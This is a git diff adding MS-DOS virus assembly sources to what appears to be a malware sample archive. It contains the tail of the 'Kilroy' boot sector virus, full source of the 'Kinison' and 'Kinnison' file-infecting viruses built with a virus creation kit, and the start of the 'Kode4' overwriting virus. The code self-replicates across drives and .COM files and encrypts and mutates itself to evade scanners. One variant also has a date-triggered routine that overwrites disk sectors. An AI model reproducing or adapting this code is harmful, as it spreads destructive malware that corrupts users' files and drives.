in 1/8 seconds + +HEAD: DB 0 ;Current head to read from (scratch area used by boot sector) + +;Here is the start of the boot sector code + +BOOT: CLI ;interrupts off + XOR AX,AX ;prepare to set up segments + MOV ES,AX ;set ES=0 + MOV SS,AX ;start stack at 0000:7C00 + MOV SP,OFFSET BOOTSEC + MOV BX,1EH*4 ;get address of disk + LDS SI,SS:[BX] ;param table in ds:si + PUSH DS + PUSH SI ;save that address + PUSH SS + PUSH BX ;and its address + + MOV DI,OFFSET DSKBASETBL ;and update default + MOV CX,11 ;values to the table stored here + CLD ;direction flag cleared +DFLT1: LODSB + CMP BYTE PTR ES:[DI],0 ;anything non-zero + JNZ SHORT DFLT2 ;is not a default, so don't save it + STOSB ;else put default value in place + JMP SHORT DFLT3 ;and go on to next +DFLT2: INC DI +DFLT3: LOOP DFLT1 ;and loop until cx=0 + + MOV AL,AH ;set ax=0 + MOV DS,AX ;set ds=0 so we can set disk tbl + MOV WORD PTR [BX+2],AX ;to @DSKBASETBL (ax=0 here) + MOV WORD PTR [BX],OFFSET DSKBASETBL ;ok, done + STI ;now turn interrupts on + INT 13H ;and reset disk drive system +ERROR1: JC ERROR1 ;if an error, hang the machine + +;Attempt to self reproduce. If this boot sector is located on drive A, it will +;attempt to relocate to drive C. If successful, it will stop, otherwise it will +;attempt to relocate to drive B. If this boot sector is located on drive C, it +;will attempt to relocate to drive B. +SPREAD: + CALL DISP_MSG ;Display the "Kilroy was here!" message + MOV BX,OFFSET DISK_BUF ;read other boot sectors into this buffer + CMP BYTE PTR [DRIVE],80H + JZ SPREAD2 ;if it's C, go try to spread to B + MOV DX,180H ;if it's A, try to spread to C first, try Head 1 + CMP BYTE PTR [HD_COUNT],0 ;see if there is a hard drive + JZ SPREAD2 ;none - try floppy B + MOV CX,1 ;read Track 0, Sector 1 + MOV AX,201H + INT 13H + JC SPREAD2 ;on error, go try drive B + CMP WORD PTR [NEW_ID],0AA55H ;make sure it really is a boot sector + JNZ SPREAD2 + CALL MOVE_DATA + MOV DX,180H ;and go write the new sector + MOV CX,1 + MOV AX,301H + INT 13H + JC SPREAD2 ;if an error writing to C:, try infecting B: + JMP SHORT LOOK_SYS ;if no error, go look for system files +SPREAD2: MOV AL,BYTE PTR [SYSTEM_INFO] ;first see if there is a B drive + AND AL,0C0H + ROL AL,1 ;put bits 6 & 7 into bits 0 & 1 + ROL AL,1 + INC AL ;add one, so now AL=# of drives + CMP AL,2 + JC LOOK_SYS ;no B drive, just quit + MOV DX,1 ;read drive B + MOV AX,201H ;read one sector + MOV CX,1 ;read Track 0, Sector 1 + INT 13H + JC LOOK_SYS ;if an error here, just exit + CMP WORD PTR [NEW_ID],0AA55H ;make sure it really is a boot sector + JNZ LOOK_SYS ;no, don't attempt reproduction + CALL MOVE_DATA ;yes, move this boot sector in place + MOV DX,1 + MOV AX,301H ;and write this boot sector to drive B + MOV CX,1 + INT 13H + +;Here we look at the first file on the disk to see if it is the first MS-DOS or +;PC-DOS system file, IO.SYS or IBMBIO.COM, respectively. +LOOK_SYS: + MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk + XOR AH,AH + MUL WORD PTR [SECS_PER_FAT] ;multiply by sectors per fat + ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors + ADD AX,WORD PTR [FAT_START] ;add starting fat sector + + PUSH AX + MOV WORD PTR [DOS_ID],AX ;root dir, save it + + MOV AX,20H ;dir entry size + MUL WORD PTR [ROOT_ENTRIES] ;dir size in ax + MOV BX,WORD PTR [SEC_SIZE] ;sector size + ADD AX,BX ;add one sector + DEC AX ;decrement by 1 + DIV BX ;ax=# sectors in root dir + ADD WORD PTR [DOS_ID],AX ;DOS_ID=start of data + MOV BX,OFFSET DISK_BUF ;set up disk read buffer at 0000:0500 + POP AX + CALL CONVERT ;and go convert sequential sector number to bios data + MOV AL,1 ;prepare for a disk read for 1 sector + CALL READ_DISK ;go read it + + MOV DI,BX ;compare first file on disk with + MOV CX,11 ;required file name + MOV SI,OFFSET SYSFILE_1 ;of first system file for PC DOS + REPZ CMPSB + JZ SYSTEM_THERE ;ok, found it, go load it + + MOV DI,BX ;compare first file with + MOV CX,11 ;required file name + MOV SI,OFFSET SYSFILE_2 ;of first system file for MS DOS + REPZ CMPSB +ERROR2: JNZ ERROR2 ;not the same - an error, so hang the machine + +;Ok, system file is there, so load it +SYSTEM_THERE: + MOV AX,WORD PTR [DISK_BUF+1CH] ;get file size of IBMBIO.COM/IO.SYS + XOR DX,DX + DIV WORD PTR [SEC_SIZE] ;and divide by sector size + INC AL ;ax=number of sectors to read + MOV BP,AX ;store that number in BP + MOV AX,WORD PTR [DOS_ID] ;get sector number of start of data + PUSH AX + MOV BX,700H ;set disk read buffer to 0000:0700 +RD_BOOT1: MOV AX,WORD PTR [DOS_ID] ;and get sector to read + CALL CONVERT ;convert to bios Trk/Cyl/Sec info + MOV AL,1 ;read one sector + CALL READ_DISK ;go read the disk + SUB BP,1 ;subtract 1 from number of sectors to read + JZ DO_BOOT ;and quit if we're done + ADD WORD PTR [DOS_ID],1 ;add sectors read to sector to read + ADD BX,WORD PTR [SEC_SIZE] ;and update buffer address + JMP RD_BOOT1 ;then go for another + + +;Ok, the first system file has been read in, now transfer control to it +DO_BOOT: + MOV CH,BYTE PTR [DISK_ID] ;Put drive type in ch + MOV DL,BYTE PTR [DRIVE] ;Drive number in dl + POP BX +; JMP FAR PTR LOAD ;use the nicer far jump if compiling with MASM or TASM + MOV AX,0070H ;A86 is too stupid to handle that, + PUSH AX ;so let's fool it with a far return + XOR AX,AX + PUSH AX + RETF + + +;Convert sequential sector number in ax to BIOS Track, Head, Sector information. +;Save track number in DX, sector number in CH, +CONVERT: + XOR DX,DX + DIV WORD PTR [SECS_PER_TRK] ;divide ax by sectors per track + INC DL ;dl=sector number to start read on, al=track/head count + MOV CH,DL ;save it here + XOR DX,DX + DIV WORD PTR [HEADS] ;divide ax by head count + MOV BYTE PTR [HEAD],DL ;dl=head number, save it + MOV DX,AX ;ax=track number, save it in dx + RET + + +;Read the disk for the number of sectors in al, into the buffer es:bx, using +;the track number in DX, the head number at HEAD, and the sector +;number at CH. +READ_DISK: + MOV AH,2 ;read disk command + MOV CL,6 ;shift possible upper 2 bits of track number to + SHL DH,CL ;the high bits in dh + OR DH,CH ;and put sector number in the low 6 bits + MOV CX,DX + XCHG CH,CL ;ch (0-5) = sector, cl, ch (6-7) = track + MOV DL,BYTE PTR [DRIVE] ;get drive number from here + MOV DH,BYTE PTR [HEAD] ;and head number from here + INT 13H ;go read the disk +ERROR3: JC ERROR3 ;hang in case of an error + RET + +;Move data that doesn't change from this boot sector to the one read in at +;DISK_BUF. That includes everything but the DRIVE ID (at offset 7DFDH) and +;the data area at the beginning of the boot sector. +MOVE_DATA: + MOV SI,OFFSET DSKBASETBL ;Move all of the boot sector code after the data area + MOV DI,OFFSET DISK_BUF + (OFFSET DSKBASETBL - OFFSET BOOTSEC) + MOV CX,OFFSET DRIVE - OFFSET DSKBASETBL + REP MOVSB + MOV SI,OFFSET BOOTSEC ;Move the initial jump and the sector ID + MOV DI,OFFSET DISK_BUF + MOV CX,11 + REP MOVSB + RET + +;Display the null terminated string at MESSAGE. +DISP_MSG: + MOV SI,OFFSET MESSAGE ;set offset of message up +DM1: MOV AH,0EH ;Execute BIOS INT 10H, Fctn 0EH (Display Char) + LODSB ;get character to display + OR AL,AL + JZ DM2 ;repeat until 0 + INT 10H ;display it + JMP SHORT DM1 ;and get another +DM2: RET + + +SYSFILE_1: DB 'IBMBIO COM' ;PC DOS System file +SYSFILE_2: DB 'IO SYS' ;MS DOS System file +MESSAGE: DB 'Kilroy was here!',0DH,0AH,0AH,0 + + ORG 7DFDH + +DRIVE: DB 0 ;Disk drive (A or C) for this sector + +BOOT_ID: DW 0AA55H ;Boot sector ID word + + +MAIN ENDS + + + END START + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.kinison.asm b/MSDOS/Virus.MSDOS.Unknown.kinison.asm new file mode 100644 index 00000000..8bd577a8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kinison.asm @@ -0,0 +1,420 @@ +; KINISON.ASM -- Sam Kinsion Virus +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Nowhere Man + +virus_type equ 0 ; Appending Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +main proc near + db 0E9h,00h,00h ; Near jump (for compatibility) +start: call find_offset ; Like a PUSH IP +find_offset: pop bp ; BP holds old IP + sub bp,offset find_offset ; Adjust for length of host + + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + + lea si,[bp + buffer] ; SI points to original start + mov di,0100h ; Push 0100h on to stack for + push di ; return to main program + movsw ; Copy the first two bytes + movsb ; Copy the third byte + + mov di,bp ; DI points to start of virus + + mov bp,sp ; BP points to stack + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer on stack + int 021h + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + lea bx,[di + null_vector] ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + call get_day + cmp ax,000Bh ; Did the function return 11? + jne skip00 ; If not equal, skip effect + call get_weekday + cmp ax,0005h ; Did the function return 5? + jne skip00 ; If not equal, skip effect + jmp short strt00 ; Success -- skip jump +skip00: jmp end00 ; Skip the routine +strt00: lea si,[di + data00] ; SI points to data + mov ah,0Eh ; BIOS display char. function +display_loop: lodsb ; Load the next char. into AL + or al,al ; Is the character a null? + je disp_strnend ; If it is, exit + int 010h ; BIOS video interrupt + jmp short display_loop ; Do the next character +disp_strnend: + +end00: xor ah,ah ; BIOS get time function + int 01Ah + xchg dx,ax ; AX holds clock ticks + mov cx,0003h ; We'll divide by 3 + cwd ; Sign-extend AX into DX:AX + div cx ; Divide AX by CX + or dx,dx ; Is there a remaindier? + jne no_infection ; If there is then don't spread + call search_files ; Find and infect a file +no_infection: + call get_day + cmp ax,000Bh ; Did the function return 11? + jne skip01 ; If not equal, skip effect + call get_weekday + cmp ax,0005h ; Did the function return 5? + jne skip01 ; If not equal, skip effect + jmp short strt01 ; Success -- skip jump +skip01: jmp end01 ; Skip the routine +strt01: mov ax,0004h ; First argument is 4 + mov cx,0010h ; Second argument is 16 + cli ; Disable interrupts (no Ctrl-C) + cwd ; Clear DX (start with sector 0) +trash_loop: int 026h ; DOS absolute write interrupt + dec ax ; Select the previous disk + cmp ax,-1 ; Have we gone too far? + jne trash_loop ; If not, repeat with new drive + sti ; Restore interrupts + +end01: +com_end: pop dx ; DX holds original DTA address + mov ah,01Ah ; DOS set DTA function + int 021h + + mov sp,bp ; Deallocate local buffer + + xor ax,ax ; + mov bx,ax ; + mov cx,ax ; + mov dx,ax ; Empty out the registers + mov si,ax ; + mov di,ax ; + mov bp,ax ; + + ret ; Return to original program +main endp + + + db 09Ch,054h,068h,09Eh,06Ch + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + lea dx,[di + root] ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + lea dx,[di + all_files] ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? + je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + lea dx,[di + up_dir] ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + lea dx,[di + com_mask] ; DX points to "*.COM" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +com_mask db "*.COM",0 ; Mask for all .COM files +traverse endp + + db 083h,01Dh,064h,0E6h,08Ah + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + db 039h,01Ch,0DDh,0C2h,0DDh + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov byte ptr [di + set_carry],0 ; Assume we'll fail + + cmp word ptr [si + 01Ah],(65279 - (finish - start)) + jbe size_ok ; If it's small enough continue + jmp infection_done ; Otherwise exit + +size_ok: mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,3 ; CX holds bytes to read (3) + lea dx,[di + buffer] ; DX points to buffer + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + xchg dx,ax ; Faster than a PUSH AX + mov ah,03Eh ; DOS close file function + int 021h + xchg dx,ax ; Faster than a POP AX + + sub ax,finish - start + 3 ; Adjust AX for a valid jump + cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? + je infection_done ; If equal then exit + mov byte ptr [di + set_carry],1 ; Success -- the file is OK + add ax,finish - start ; Re-adjust to make the jump + mov word ptr [di + new_jump + 1],ax ; Construct jump + + mov ax,04301h ; DOS set file attrib. function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, r/w + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,040h ; DOS write to file function + mov cx,3 ; CX holds bytes to write (3) + lea dx,[di + new_jump] ; DX points to the jump we made + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + push si ; Save SI through call + call encrypt_code ; Write an encrypted copy + pop si ; Restore SI + + mov ax,05701h ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attrib. function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + +infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +set_carry db ? ; Set-carry-on-exit flag +buffer db 090h,0CDh,020h ; Buffer to hold old three bytes +new_jump db 0E9h,?,? ; New jump to virus +infect_file endp + + + db 087h,04Ch,0B3h,047h,001h + +get_day proc near + mov ah,02Ah ; DOS get date function + int 021h + mov al,dl ; Copy day into AL + cbw ; Sign-extend AL into AX + ret ; Return to caller +get_day endp + + db 0FFh,024h,0C3h,092h,07Fh + +get_weekday proc near + mov ah,02Ah ; DOS get date function + int 021h + cbw ; Sign-extend AL into AX + ret ; Return to caller +get_weekday endp + +data00 db 7,7,7,"DIE BITCH!!!!! AHHHHHHHH!!!!!!!",13,10,0 + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "This *VIRUS* is dedecated to t" + db "he memory of Sam Kinsion, 1954" + db "-1992",0 + db "[Kinison]",0 + db "Nowhere Man, [NuKE] '92",0 + +encrypt_code proc near + push bp ; Save BP + mov bp,di ; Use BP as pointer to code + lea si,[bp + encrypt_decrypt]; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 9],dx ; Low word of timer is new key + + xor byte ptr [si + 1],8 ; + xor byte ptr [si + 8],1 ; Change all SIs to DIs + xor word ptr [si + 11],0101h; (and vice-versa) + + lea di,[bp + finish] ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + lea si,[bp + write_stuff] ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + lea dx,[bp + start] ; DX points to virus + + lea si,[bp + finish] ; SI points to routine + call si ; Encrypt/write/decrypt + + mov di,bp ; DI points to virus again + pop bp ; Restore BP + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + +encrypt_decrypt proc near + lea si,[bp + start_of_code] ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: db 081h,034h,00h,00h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.kinnison.asm b/MSDOS/Virus.MSDOS.Unknown.kinnison.asm new file mode 100644 index 00000000..21007ef2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kinnison.asm @@ -0,0 +1,397 @@ +; KINNISON.ASM -- Sam Kinnison virus +; Created by Nowhere Man's Virus Creation Labratory v0.75 +; Written by Nowhere Man + +virus_type equ 0 + +code segment 'CODE' + assume cs:code,ds:code,es:code,ss:code + org 0100h + +main proc near +flag: mov ah,0 + nop + nop + + jmp start ; Would be at start of victim + nop + nop +start: call find_offset ; Push IP on to stack, advance IP +find_offset: pop di ; DI holds old IP + sub di,3 ; Adjust for length of CALL + + lea si,[di + start_of_code - start] ; SI points to code + call encrypt_decrypt ; Decrypt the code + +start_of_code label near + + push di ; Save DI + mov si,offset flag ; SI points to flag bytes + lea di,[di + new_jump - start] ; DI points to start of jump + movsw ; Transfer two bytes + movsw ; Transfer two bytes + pop di ; Restore DI + push di ; And save it for later + lea si,[di + buffer - start]; SI points to old start + mov di,0100h ; DI points to start of code + movsw ; Transfer two bytes + movsw ; Transfer two bytes + movsw ; Transfer two bytes + movsb ; Transfer final byte + pop di ; Restore DI + + mov bp,sp ; BP points to stack + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer on stack + int 021h + + call get_day + cmp ax,000Bh + jne end00 + call get_weekday + cmp ax,0005h + jne end00 + mov cx,0003h + call beep +end00: xor ah,ah ; BIOS get time function + int 01Ah + test dx,0001h + jne no_infection + call search_files +no_infection: + call get_day + cmp ax,000Bh + jne end01 + call get_weekday + cmp ax,0005h + jne end01 + lea si,[di + data00 - start] ; SI points to data + call display_string +end01: pop dx ; DX holds original DTA address + mov ah,01Ah ; DOS set DTA function + int 021h + + mov sp,bp ; Deallocate local buffer + + mov di,0100h ; Push 0100h on to stack for + push di ; return to main program + + xor ax,ax ; + mov bx,ax ; + mov cx,ax ; + mov dx,ax ; Empty out the registers + mov si,ax ; + mov di,ax ; + mov bp,ax ; + + ret ; Return to original program +main endp + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + lea dx,[di + root - start] ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + mov dx,offset all_files ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? + je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + mov ah,03Bh ; DOS change directory function + lea dx,[di + up_dir - start]; DX points to parent directory + int 021h + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + lea dx,[di + com_mask - start] ; DX points to "*.COM" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +com_mask db "*.COM",0 ; Mask for all .COM files +traverse endp + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov ax,04301h ; DOS set file attributes function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, r/w + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,7 ; CX holds bytes to read (7) + lea dx,[di + buffer - start]; DX points to buffer + int 021h + + push si ; Save DTA address before compare + mov byte ptr [di + set_carry - start],0 ; Assume we'll fail + lea si,[di + buffer - start]; SI points to comparison buffer + push di ; Save virus offset + lea di,[di + new_jump - start] ; DI points to virus flag + mov cx,4 ; CX holds number of bytes (4) + rep cmpsb ; Compare the first four bytes + pop di ; Restore DI + je close_it_up ; If equal then close up + mov byte ptr [di + set_carry - start],1 ; Success -- the file is OK + + cwd ; Zero CX _ Zero bytes from start + mov cx,dx ; Zero DX / + mov ax,04200h ; DOS file seek function, start + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + sub ax,7 ; Prepare for JMP + mov word ptr [di + new_jump + 5 - start],ax ; Construct JMP for later + + call encrypt_code ; Make an encrypted copy of ourself + + mov ah,040h ; DOS write to file function + mov cx,finish - start ; CX holds virus length + lea dx,[di + finish - start] ; DX points to encrypted copy + int 021h + + cwd ; Zero DX _ Zero bytes from start + mov cx,dx ; Zero CX / + mov ax,04200h ; DOS file seek function, start + int 021h + + mov ah,040h ; DOS write to file function + mov cx,7 ; CX holds bytes to write (7) + lea dx,[di + new_jump - start] ; DX points to the jump we made + int 021h + +close_it_up: pop si ; Restore DTA address + + mov ax,05701h ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attributes function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + +infection_done: cmp byte ptr [di + set_carry - start],1 ; Set carry flag if failed + ret ; Return to caller + +set_carry db ? ; Set-carry-on-exit flag +buffer db 5 dup (090h),0CDh,020h ; Buffer to hold test data +new_jump db 4 dup (?),0E9h,?,? ; New jump to virus +infect_file endp + + +beep proc near + jcxz beep_end ; Exit if there are no beeps + + mov ax,0E07h ; BIOS display char., BEL +beep_loop: int 010h ; Beep + loop beep_loop ; Beep until --CX = 0 + +beep_end: ret ; Return to caller +beep endp + +display_string proc near + mov ah,0Eh ; BIOS display char. function +display_loop: lodsb ; Load the next char. into AL + or al,al ; Is the character a null? + je disp_strnend ; If it is, exit + int 010h ; BIOS video interrupt + jmp short display_loop ; Do the next character +disp_strnend: ret ; Return to caller +display_string endp + +get_day proc near + mov ah,02Ah ; DOS get date function + int 021h + mov al,dl ; Copy day into AL + cbw ; Sign-extend AL into AX + ret ; Return to caller +get_day endp + +get_weekday proc near + mov ah,02Ah ; DOS get date function + int 021h + cbw ; Sign-extend AL into AX + ret ; Return to caller +get_weekday endp + +data00 db "DIE BITCH!!!!! AHHHHHHHH!!!!!!!",13,10,0 + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "Dedicated to the memory of" + db " Sam Kinnison 1954-1992",0 + db "[Kinnison]",0 + db "Nowhere Man, [NuKE] '92",0 +encrypt_code proc near + push bx ; Save BX + + push di ; Save DI + lea si,[di + encrypt_decrypt - start] ; SI points to encryption code + + xor ah,ah ; BIOS get time function + int 01Ah + or dx,1 ; Insure we never get zero + mov word ptr [si + 5],dx ; Low word of timer is new key + +alter_flag: mov al,0 ; AL holds alteration flag + inc byte ptr [di + (alter_flag + 1) - start] ; Toggle alteration flag + + test al,1 ; Is bit one set? + jne check_nop ; If not then don't toggle + + xor byte ptr [si],0110b ; Change all BPs in startup code + xor byte ptr [si + 4],010b ; to BXs, and vice-versa + xor byte ptr [si + 7],0110b ; + +check_nop: test al,2 ; Is bit two set? + jne do_encryption ; If not then don't toggle + + mov ax,word ptr [si + 7] ; AX holds INC/NOP + xchg ah,al ; Exchange position of INC and NOP + mov word ptr [si + 7],ax ; Put the word back + +do_encryption: mov si,di ; SI points to start of code + lea di,[di + finish - start] ; DI points past code + mov cx,(finish - start) / 2 ; CX holds words to transfer + rep movsw ; Copy the code past the end + + pop di ; Restore DI + lea si,[di + (finish + (start_of_code - start)) - start] ; SI points to code to encrypt + call encrypt_decrypt ; Encrypt the code + + pop bx ; Restore BX + ret ; Return to caller +encrypt_code endp + +even ; Must be on an even boundry + +end_of_code label near + +encrypt_decrypt proc near + mov bp,end_of_code - start_of_code - 2 ; BP holds length of code +xor_loop: db 081h,032h,00h,00h ; XOR a word with the key + dec bp ; Do the next byte + nop ; Used to throw off detectors + jne xor_loop ; Repeat until we're done + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.kode4-1.asm b/MSDOS/Virus.MSDOS.Unknown.kode4-1.asm new file mode 100644 index 00000000..38ea9e91 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kode4-1.asm @@ -0,0 +1,94 @@ +;###################################################################### +;# Name: Kode4 version 1.0 (overwritting stage) +;# Author: Soltan Griss [YAM] +;# +;# Description: What this sucker does is very simple. it overwrites +;# the first 46 bytes of all com files in the current +;# directory, with it's own code... as of scanv93, this +;# virus is undetectable.. +;# +;# +;# Special Thanks go out to Data Disruptor.. If it were not for you i +;# would still be fucking lost!!!! +;# +;###################################################################### + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h +V_Length equ last-start +KODE4 proc far + +start label near ;Check for Virex 